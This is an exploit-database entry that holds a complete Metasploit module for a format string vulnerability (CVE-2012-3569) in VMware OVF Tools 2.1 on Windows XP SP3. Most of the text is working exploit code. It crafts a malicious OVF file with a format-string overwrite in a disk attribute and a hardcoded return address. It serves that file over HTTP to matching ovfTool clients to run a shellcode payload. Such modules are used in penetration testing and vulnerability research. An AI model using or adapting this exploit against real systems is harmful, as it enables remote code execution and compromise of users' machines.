VMWare OVF Tools Format String Vulnerability

2013-02-07T00:00:00
ID 1337DAY-ID-20310
Type zdt
Reporter metasploit
Modified 2013-02-07T00:00:00

Description

This Metasploit module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3.

                                        
                                            ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::Remote::HttpServer::HTML
 
    def initialize(info={})
        super(update_info(info,
            'Name'           => 'VMWare OVF Tools Format String Vulnerability',
            'Description'    => %q{
                    This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for
                Windows. The vulnerability occurs when printing error messages while parsing a
                a malformed OVF file. The module has been tested successfully with VMWare OVF Tools
                2.1 on Windows XP SP3.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Jeremy Brown', # Vulnerability discovery
                    'juan vazquez'  # Metasploit Module
                ],
            'References'     =>
                [
                    [ 'CVE', '2012-3569' ],
                    [ 'OSVDB', '87117' ],
                    [ 'BID', '56468' ],
                    [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ]
                ],
            'Payload'        =>
                {
                    'DisableNops'    => true,
                    'BadChars'       =>
                        (0x00..0x08).to_a.pack("C*") +
                        "\x0b\x0c\x0e\x0f" +
                        (0x10..0x1f).to_a.pack("C*") +
                        (0x80..0xff).to_a.pack("C*") +
                        "\x22",
                    'StackAdjustment' => -3500,
                    'PrependEncoder'  => "\x54\x59", # push esp # pop ecx
                    'EncoderOptions'  =>
                        {
                            'BufferRegister' => 'ECX',
                            'BufferOffset'   => 6
                        }
                },
            'DefaultOptions' =>
                {
                    'InitialAutoRunScript' => 'migrate -f'
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    # vmware-ovftool-2.1.0-467744-win-i386.msi
                    [ 'VMWare OVF Tools 2.1 on Windows XP SP3',
                        {
                            'Ret'          => 0x7852753d,  # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1
                            'AddrPops'     => 98,
                            'StackPadding' => 38081,
                            'Alignment'    => 4096
                        }
                    ],
                ],
            'Privileged'     => false,
            'DisclosureDate' => 'Nov 08 2012',
            'DefaultTarget'  => 0))
 
    end
 
    def ovf
        my_payload = rand_text_alpha(4) # ebp
        my_payload << [target.ret].pack("V") # eip # call esp
        my_payload << payload.encoded
 
        fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000)
        fs << rand_text_alpha(target['Alignment']) # Align to 0x11000
        fs << my_payload
        # 65536 => 0x10000
        # 27    => Error message prefix length
        fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8))
        fs << "%08x" * target['AddrPops'] # Reach saved EBP
        fs << "%hn" # Overwrite LSW of saved EBP with 0x1000
 
        ovf_file = <<-EOF
<?xml version="1.0" encoding="UTF-8"?>
<Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1"
xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common"
xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1"
xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData"
xmlns:vmw="http://www.vmware.com/schema/ovf"
xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <References>
        <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" />
    </References>
    <DiskSection>
        <Info>Virtual disk information</Info>
        <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" />
    </DiskSection>
    <VirtualSystem ovf:id="Small VM">
        <Info>A virtual machine</Info>
    </VirtualSystem>
</Envelope>
        EOF
        ovf_file
    end
 
    def on_request_uri(cli, request)
        agent = request.headers['User-Agent']
        uri   = request.uri
 
        if agent !~ /VMware-client/ or agent !~ /ovfTool/
            print_status("User agent #{agent} not recognized, answering Not Found...")
            send_not_found(cli)
        end
 
        if uri =~ /.mf$/
            # The manifest file isn't required
            print_status("Sending Not Found for Manifest file request...")
            send_not_found(cli)
        end
 
        print_status("Sending OVF exploit...")
        send_response(cli, ovf, {'Content-Type'=>'text/xml'})
    end
 
end

#  0day.today [2018-04-04]  #